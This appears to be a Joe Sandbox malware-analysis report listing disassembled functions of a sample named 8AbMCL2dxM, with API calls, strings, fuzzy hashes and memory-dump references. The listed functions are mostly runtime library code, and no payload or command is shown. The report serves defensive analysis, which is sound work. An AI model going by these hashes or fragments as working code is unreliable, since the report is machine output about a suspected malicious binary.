                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: 1e2caa057b1d42bdb24a2a9725035414ef2cbe5bdc18c278bcb34cff11f70865
                                      • Instruction ID: 3e2d86b52debef99aec2d18788ffadf564e5e1825a73406a7cc3daf5518cea79
                                      • Opcode Fuzzy Hash: 1e2caa057b1d42bdb24a2a9725035414ef2cbe5bdc18c278bcb34cff11f70865
                                      • Instruction Fuzzy Hash: CA51D173610216AFEB299E64CC81FBB77AEEB81750F158629FC08D7141EB34DC40D691
                                      Function 0097CE27 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$EnvironmentVariable
                                      • String ID:
                                      • API String ID: 1464849758-0
                                      • Opcode ID: 6d380abf27b04f1058aaaffce21094a36af7fd01093af9e0b9a6039befec3cef
                                      • Instruction ID: 46b885238e60aed36238e832f964573912b53d4ad32b23d63513aa0c571ca81c
                                      • Opcode Fuzzy Hash: 6d380abf27b04f1058aaaffce21094a36af7fd01093af9e0b9a6039befec3cef
                                      • Instruction Fuzzy Hash: 2E6104B3949700AFDB20AF788841B7E7BA9EF45720F05C16EF90C97282EB759D408790
                                      Function 008F6E00 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 310COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F6FA3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F6FE3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F7181
                                      Strings
                                      • : invalid ciphertext, xrefs: 008F6FB7
                                      • PK_DefaultEncryptionFilter: plaintext too long, xrefs: 008F7158
                                      • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 008F6F7A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long
                                      • API String ID: 2005118841-2902848663
                                      • Opcode ID: 789189a86dd4ee86ab21d26ff751bc5ae12a36bbbbd5b2ec3774bc5c880f8372
                                      • Instruction ID: c63567c4f880d58850698b59143c81adbb139c6f2c54712e3f49f8cbd6ac6ad2
                                      • Opcode Fuzzy Hash: 789189a86dd4ee86ab21d26ff751bc5ae12a36bbbbd5b2ec3774bc5c880f8372
                                      • Instruction Fuzzy Hash: 4CB17A71A007099FCB24DFA9C894FAABBF5FF48714F104A2CE646D7690EB71A914CB50
                                      Function 0097844D Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 257COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate
                                      • String ID: PATH$\
                                      • API String ID: 124695548-1896636505
                                      • Opcode ID: 4192f65b7577d6112990d54e6e9edceac7b81f5aa0851a0d3c49440bef5d309a
                                      • Instruction ID: aa4d450965269f85e367d7c9b9ea778c80c8fc181d4018129c7f62860191aa98
                                      • Opcode Fuzzy Hash: 4192f65b7577d6112990d54e6e9edceac7b81f5aa0851a0d3c49440bef5d309a
                                      • Instruction Fuzzy Hash: 54716A739443026EDF25AF64DC49BBF7BAD9F81320F258059F408AB2D2EE718D418765
                                      Function 009757AC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,0096B33E,E0830C40,?,?,?,?,?,?,00975F21,00929776,0096B33E,?,0096B33E,0096B33E,00929776), ref: 009757EE
                                      • __fassign.LIBCMT ref: 00975869
                                      • __fassign.LIBCMT ref: 00975884
                                      • WideCharToMultiByte.KERNEL32(?,00000000,0096B33E,00000001,?,00000005,00000000,00000000), ref: 009758AA
                                      • WriteFile.KERNEL32(?,?,00000000,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 009758C9
                                      • WriteFile.KERNEL32(?,00929776,00000001,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 00975902
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 19ec308a94a784dc4015bb92eb790db8176c16a5b536a55cdb97126126b20a1d
                                      • Instruction ID: d8f330c210e61f6a6aba577e348a8a2b6b21f61ad008fb725daebac4d9f38282
                                      • Opcode Fuzzy Hash: 19ec308a94a784dc4015bb92eb790db8176c16a5b536a55cdb97126126b20a1d
                                      • Instruction Fuzzy Hash: 5851B272A04649DFCB10CFA8D885AEEBBF8EF09310F15815AE959E7251E7709D40CB61
                                      Function 008ECC80 Relevance: 10.6, APIs: 7, Instructions: 135COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                      • String ID:
                                      • API String ID: 2755674607-0
                                      • Opcode ID: 4bc41e61597825a033299733f36334d64ba777d757f6a94da1c55a8c24922f22
                                      • Instruction ID: 27099b16249e8bbf22ef8990f4159af2eadb0918971ad72e836d5170d2a73541
                                      • Opcode Fuzzy Hash: 4bc41e61597825a033299733f36334d64ba777d757f6a94da1c55a8c24922f22
                                      • Instruction Fuzzy Hash: FC51E371D04759CFCB10DF29D841BAAB7B4FF59310F14426AE846AB352EB31A981CBD1
                                      Function 009530E1 Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00953109
                                        • Part of subcall function 00952E76: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00952EA9
                                        • Part of subcall function 00952E76: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00952ECB
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00953186
                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00953192
                                      • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 009531A1
                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 009531AB
                                      • Concurrency::location::_Assign.LIBCMT ref: 009531DF
                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 009531E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                      • String ID:
                                      • API String ID: 1924466884-0
                                      • Opcode ID: d6e76b50500be7162053595e0ddcf221587e03db1780aaa80cfa1a137eee6db9
                                      • Instruction ID: 3c42cf0aa948ff49b945b94927467b8dbea3dadcaeca1bb454530f55b586bef4
                                      • Opcode Fuzzy Hash: d6e76b50500be7162053595e0ddcf221587e03db1780aaa80cfa1a137eee6db9
                                      • Instruction Fuzzy Hash: D7415A35A00208DFCB04EF65C485BADB7B9FF88351F1480AADD059B242DB30AA45CB91
                                      Function 00982793 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9419c62d196da06191a65e9d687afebd8a953dc122ae93fbb6ab85d721b2845b
                                      • Instruction ID: 82b462bab30e54ab3408811d96fcf62ad4685e74d16e4e234bd146f41c6d1e40
                                      • Opcode Fuzzy Hash: 9419c62d196da06191a65e9d687afebd8a953dc122ae93fbb6ab85d721b2845b
                                      • Instruction Fuzzy Hash: 9F11B172918214BBDB207F768C49E6B7B6CEFC6770B118629B815D7251DA388901DBA0
                                      Function 009596FB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 0095974E
                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00959767
                                      • PMDtoOffset.LIBCMT ref: 0095978D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FindInstanceTargetType$Offset
                                      • String ID: Bad dynamic_cast!
                                      • API String ID: 1467055271-2956939130
                                      • Opcode ID: 07c904f09cb801acaf473ab4871d8013036ae78c85adee1072f6ec22b61c36d2
                                      • Instruction ID: 5848d3f1d08ce7cf453dcedca2f871b2444559d55ed1ffb10236da6828e36876
                                      • Opcode Fuzzy Hash: 07c904f09cb801acaf473ab4871d8013036ae78c85adee1072f6ec22b61c36d2
                                      • Instruction Fuzzy Hash: 60212672A10205EFEF14DFA6CD06BAE37B8FB88711F10461AED1197180D734E90987A1
                                      Function 00932058 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                      • String ID: $+xv
                                      • API String ID: 2737107202-1686923651
                                      • Opcode ID: 650a4fb0d6bbecb0bc5a5787d6ba430130ed26026d1cbedba9fe1e6e82a4b209
                                      • Instruction ID: fdb7bf4ef7cc679a79e741a4c45933a04dd713fa2f0df2f19a07bf7d2a034791
                                      • Opcode Fuzzy Hash: 650a4fb0d6bbecb0bc5a5787d6ba430130ed26026d1cbedba9fe1e6e82a4b209
                                      • Instruction Fuzzy Hash: 2721B0B1904B566ED729DF74888073BBEF8AF48300F044A1AE499C7A42D734EA45CFA0
                                      Function 0097E083 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0097DDCA: _free.LIBCMT ref: 0097DDF3
                                      • _free.LIBCMT ref: 0097E0D1
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 0097E0DC
                                      • _free.LIBCMT ref: 0097E0E7
                                      • _free.LIBCMT ref: 0097E13B
                                      • _free.LIBCMT ref: 0097E146
                                      • _free.LIBCMT ref: 0097E151
                                      • _free.LIBCMT ref: 0097E15C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1f344ad25b2dc88bb6b0102a31732e2654b900e7b075d54f964a6f3a38e806a5
                                      • Instruction ID: 039deb6a849f2c3fe0b0e57fe585df140fcb4af32722d6413760b5b11e8275e2
                                      • Opcode Fuzzy Hash: 1f344ad25b2dc88bb6b0102a31732e2654b900e7b075d54f964a6f3a38e806a5
                                      • Instruction Fuzzy Hash: 4F115E73581B04EAD630FBB0CD0BFCB77ADAF84B00F848C15B69EA6492DA75B5048650
                                      Function 0094E054 Relevance: 10.6, APIs: 7, Instructions: 51threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0094E05B
                                      • GetCurrentThreadId.KERNEL32 ref: 0094E062
                                      • atomic_compare_exchange.LIBCONCRT ref: 0094E070
                                      • atomic_compare_exchange.LIBCONCRT ref: 0094E094
                                        • Part of subcall function 00929C01: mtx_do_lock.LIBCPMT ref: 00929C09
                                      • __Mtx_unlock.LIBCPMT ref: 0094E0B9
                                      • __Cnd_broadcast.LIBCPMT ref: 0094E0CF
                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0094E0E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_CurrentH_prolog3Mtx_unlockReleaseThreadmtx_do_lock
                                      • String ID:
                                      • API String ID: 420504553-0
                                      • Opcode ID: 9495af8183974098c70a93c4318a5763e5625f84809d6982fcf581120e8ef128
                                      • Instruction ID: 8e48682f8b2eb57976b41cb6d41b21bfeebf1d6f695ce60e13d041d33da965ce
                                      • Opcode Fuzzy Hash: 9495af8183974098c70a93c4318a5763e5625f84809d6982fcf581120e8ef128
                                      • Instruction Fuzzy Hash: 1A01B1B5D0160567CB10BBB49D47F9EB39DBF85310F504511F82497282DF78EA5087A6
                                      Function 00942FBE Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FCC
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FD2
                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FFF
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00943009
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 0094301B
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943031
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094303F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                      • String ID:
                                      • API String ID: 4227777306-0
                                      • Opcode ID: 571ecb02615c81e4f10fa136017c2e9a6a8ea3ae1c12b3672687778f09f1abed
                                      • Instruction ID: 4d72f91e9d1a10d0344cb0609ef34445cf37e95732330047a4556a6700dc77e5
                                      • Opcode Fuzzy Hash: 571ecb02615c81e4f10fa136017c2e9a6a8ea3ae1c12b3672687778f09f1abed
                                      • Instruction Fuzzy Hash: 09018F31618105A7CB20AF7ADD0AFAF776CEB80751F50852AF511E20A1EF24EE049B64
                                      Function 00940AE0 Relevance: 10.1, APIs: 8, Instructions: 124memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TlsGetValue.KERNEL32(FFFFFFFF,BA3649C5,?,?,?,?,?,00990D68,000000FF), ref: 00940B15
                                      • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00940B59
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00990D68,000000FF), ref: 00940B7F
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,00990D68,000000FF), ref: 00940B86
                                      • GetProcessHeap.KERNEL32(00000000), ref: 00940BC0
                                      • HeapFree.KERNEL32(00000000), ref: 00940BC7
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00940BD0
                                      • HeapFree.KERNEL32(00000000), ref: 00940BD7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess$Value
                                      • String ID:
                                      • API String ID: 3709577838-0
                                      • Opcode ID: ba6af8400aba9c617b480b9361ecdbc20ea69a4d1824cf3fd51a9c9b32522f6b
                                      • Instruction ID: 6fd63b20e8152603fc7de47d40705adeafd9bca6aec103b2b395bbc8c2a28ce1
                                      • Opcode Fuzzy Hash: ba6af8400aba9c617b480b9361ecdbc20ea69a4d1824cf3fd51a9c9b32522f6b
                                      • Instruction Fuzzy Hash: 6E418431A192009FDF208F69DC89F1777A8EF84725F044669FA55D7291D730DC00CB54
                                      Function 0096CDD6 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: f26fe44b9a344a0565ef7ac38cb39cd088633c493726429bb978aea5682bad31
                                      • Instruction ID: f0e3cab5903fd52dc2e5d899c644d120aab2eaa246866ce3f9d7fc3eb38f96c7
